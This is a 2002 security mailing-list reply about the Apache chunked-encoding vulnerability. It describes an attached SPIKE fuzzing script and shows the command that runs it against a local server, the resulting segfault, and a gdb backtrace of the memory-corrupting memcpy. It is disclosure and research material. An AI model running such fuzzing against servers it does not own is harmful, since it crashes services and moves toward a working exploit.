Re: ISS Advisory: Remote Compromise Vulnerability in Apache HTTP Server

[Dave Aitel <dave () immunitysec com>]

I don't sell a scanner product.

This is a spike script, and the associated generic spike .c and a
makefile. Get SPIKE 2.4 to compile and run this.

$ make; ./generic_chunked localhost 80 apachechunked.spk 0 0 
make: Nothing to be done for `all'.
Target is localhost
Fuzzing Variable 0:0
parsing apachechunked.spk

[Tue Jun 18 15:53:09 2002] [notice] child pid 17647 exit signal
Segmentation fault (11)
Server: Apache-AdvancedExtranetServer/1.3.23 (Mandrake Linux/4mdk)
auth_ldap/1.6.0 mod_ssl/2.8.7 OpenSSL/0.9.6c PHP/4.1.2


(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1024 (LWP 17224)]
0x401b2d79 in memcpy () from /lib/libc.so.6
(gdb) where
#0  0x401b2d79 in memcpy () from /lib/libc.so.6
#1  0x080950a0 in ?? ()
#2  0x0806366f in ap_get_client_block ()
#3  0x08065b5f in ap_discard_request_body ()
#4  0xd8000000 in ?? ()
Cannot access memory at address 0x80975
(gdb) x/2i $pc
0x401b2d79 <memcpy+41>: mov    0x1c(%edi),%edx
0x401b2d7c <memcpy+44>: sub    $0x20,%ecx
(gdb) print/x $edi
$1 = 0xbfffffec
(gdb) q


_____________________________
Dave Aitel
Immunity, Inc.
http://www.immunitysec.com

Attachment: apachefun.tar
Description:

Attachment: signature.asc
Description: This is a digitally signed message part